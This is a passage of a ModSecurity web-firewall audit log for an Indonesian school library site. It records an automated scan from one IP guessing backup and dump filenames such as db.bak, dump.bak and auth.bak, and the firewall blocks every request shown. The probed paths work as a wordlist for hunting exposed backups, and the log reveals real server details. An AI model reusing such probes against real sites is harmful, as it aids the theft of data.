"27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855650119 2799 (- - -) Stopwatch2: 1747543855650119 2799; combined=1181, p1=788, p2=364, p3=0, p4=0, p5=29, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d20db76-Z-- --7f7e337c-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EgQAAAEg 103.236.140.4 55706 103.236.140.4 8181 --7f7e337c-B-- GET /php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70844446 --7f7e337c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f7e337c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855649521 5992 (- - -) Stopwatch2: 1747543855649521 5992; combined=1008, p1=626, p2=354, p3=0, p4=0, p5=28, sr=212, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f7e337c-Z-- --ba5d3113-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EggAAAEc 103.236.140.4 55712 103.236.140.4 8181 --ba5d3113-B-- GET /2022.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153649158 --ba5d3113-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ba5d3113-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855644519 11243 (- - -) Stopwatch2: 1747543855644519 11243; combined=812, p1=414, p2=362, p3=0, p4=0, p5=35, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba5d3113-Z-- --2f892772-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8OQAAAAw 103.236.140.4 56190 103.236.140.4 8181 --2f892772-B-- GET /smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155582467 --2f892772-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2f892772-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855647612 9380 (- - -) Stopwatch2: 1747543855647612 9380; combined=1755, p1=369, p2=1353, p3=0, p4=0, p5=32, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f892772-Z-- --eafac713-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EbAAAAE8 103.236.140.4 55714 103.236.140.4 8181 --eafac713-B-- GET /auth.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155418627 --eafac713-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eafac713-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855641538 18963 (- - -) Stopwatch2: 1747543855641538 18963; combined=3458, p1=2996, p2=332, p3=0, p4=0, p5=130, sr=1582, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eafac713-Z-- --cbdf5f1d-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EhAAAAEg 103.236.140.4 56234 103.236.140.4 8181 --cbdf5f1d-B-- GET /erpustakaan_smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 148848332 --cbdf5f1d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cbdf5f1d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855655824 5458 (- - -) Stopwatch2: 1747543855655824 5458; combined=1035, p1=473, p2=524, p3=0, p4=0, p5=38, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdf5f1d-Z-- --d6546c01-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdqAAAAMA 103.236.140.4 54062 103.236.140.4 8181 --d6546c01-B-- GET /media.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155385859 --d6546c01-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d6546c01-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855655857 9360 (- - -) Stopwatch2: 1747543855655857 9360; combined=785, p1=395, p2=358, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6546c01-Z-- --56311b22-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EkAAAAE8 103.236.140.4 55666 103.236.140.4 8181 --56311b22-B-- GET /2020.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/55.0.2994.37 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151519244 --56311b22-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --56311b22-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855663918 2274 (- - -) Stopwatch2: 1747543855663918 2274; combined=732, p1=372, p2=333, p3=0, p4=0, p5=27, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56311b22-Z-- --ff69ff5a-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8VgAAAA4 103.236.140.4 55728 103.236.140.4 8181 --ff69ff5a-B-- GET /db.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118390799 --ff69ff5a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ff69ff5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855652756 17825 (- - -) Stopwatch2: 1747543855652756 17825; combined=782, p1=383, p2=366, p3=0, p4=0, p5=33, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff69ff5a-Z-- --1019de5a-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5ElwAAAEE 103.236.140.4 55700 103.236.140.4 8181 --1019de5a-B-- GET /erpustakaan.smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 77289120 --1019de5a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1019de5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855668994 2813 (- - -) Stopwatch2: 1747543855668994 2813; combined=1081, p1=404, p2=642, p3=0, p4=0, p5=34, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1019de5a-Z-- --27a6f479-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EhgAAAFg 103.236.140.4 56254 103.236.140.4 8181 --27a6f479-B-- GET /joomla.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155713539 --27a6f479-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --27a6f479-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855656514 16337 (- - -) Stopwatch2: 1747543855656514 16337; combined=14502, p1=403, p2=14070, p3=0, p4=0, p5=29, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27a6f479-Z-- --1e35094e-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSkwAAAJM 103.236.140.4 56286 103.236.140.4 8181 --1e35094e-B-- GET /erpustakaan.smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150142991 --1e35094e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1e35094e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855668858 4917 (- - -) Stopwatch2: 1747543855668858 4917; combined=1045, p1=378, p2=559, p3=0, p4=0, p5=108, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e35094e-Z-- --8a38bf05-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8VQAAABI 103.236.140.4 56314 103.236.140.4 8181 --8a38bf05-B-- GET /smkn22jakarta.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.58 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150798351 --8a38bf05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8a38bf05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855659568 14656 (- - -) Stopwatch2: 1747543855659568 14656; combined=1781, p1=1239, p2=500, p3=0, p4=0, p5=41, sr=427, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a38bf05-Z-- --97ff5955-A-- [18/May/2025:11:50:56 +0700] aClnMBir-GlPrFVVKe5EngAAAFI 103.236.140.4 56240 103.236.140.4 8181 --97ff5955-B-- GET /dump.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:58.0.1) Gecko/20100101 Firefox/58.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634520 --97ff5955-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --97ff5955-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856233611 3120 (- - -) Stopwatch2: 1747543856233611 3120; combined=1086, p1=680, p2=366, p3=0, p4=0, p5=39, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97ff5955-Z-- --0afe0e40-A-- [18/May/2025:11:50:56 +0700] aClnMEPRqak7bVuUS6cSogAAAII 103.236.140.4 56272 103.236.140.4 8181 --0afe0e40-B-- GET /wwwroot.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.58 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 119144460 --0afe0e40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0afe0e40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856236683 12308 (- - -) Stopwatch2: 1747543856236683 12308; combined=874, p1=404, p2=424, p3=0, p4=0, p5=46, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0afe0e40-Z-- --9f565e7b-A-- [18/May/2025:11:50:56 +0700] aClnMBir-GlPrFVVKe5ErgAAAEk 103.236.140.4 56252 103.236.140.4 8181 --9f565e7b-B-- GET /2024.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153354252 --9f565e7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9f565e7b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856243238 6566 (- - -) Stopwatch2: 1747543856243238 6566; combined=3879, p1=3438, p2=403, p3=0, p4=0, p5=38, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f565e7b-Z-- --8763a90c-A-- [18/May/2025:11:50:56 +0700] aClnMBir-GlPrFVVKe5EtQAAAFA 103.236.140.4 56220 103.236.140.4 8181 --8763a90c-B-- GET /bak.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123775199 --8763a90c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8763a90c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856248712 2178 (- - -) Stopwatch2: 1747543856248712 2178; combined=815, p1=391, p2=389, p3=0, p4=0, p5=34, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8763a90c-Z-- --316f7120-A-- 